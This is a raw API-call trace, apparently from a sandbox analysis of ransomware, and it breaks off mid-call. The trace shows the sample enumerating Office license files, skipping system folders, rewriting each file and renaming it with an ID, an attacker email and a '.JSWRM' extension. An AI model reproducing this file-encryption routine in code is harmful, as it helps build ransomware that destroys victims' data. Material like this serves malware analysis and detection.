lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0111.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0111.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0111.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0111.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0111.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0111.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.888] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0111.888] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.888] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.891] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.891] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.891] CloseHandle (hObject=0x45c) returned 1 [0111.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0111.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0111.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0111.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0111.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0111.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0111.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0111.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0111.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.892] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec560c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec560c57, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec5f95b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5170, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_SubTest-ppd.xrm-ms", cAlternateFileName="VISIOS~1.XRM")) returned 1 [0111.892] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0111.892] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0111.892] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0111.892] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0111.892] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.892] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.893] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.893] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.893] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.893] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.894] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20848) returned 1 [0111.894] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.894] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.897] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.897] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.897] CloseHandle (hObject=0x45c) returned 1 [0111.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0111.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0111.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0111.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0111.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0111.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.897] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0111.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.898] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec5f95b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec5f95b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec6b8199, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d67, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="VISIOS~4.XRM")) returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.903] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.904] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11623) returned 1 [0111.904] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.904] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.907] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.907] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.907] CloseHandle (hObject=0x45c) returned 1 [0111.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0111.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0111.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0111.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0111.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0111.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0111.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.908] FindNextFileW (in: hFindFile=0x231d40, 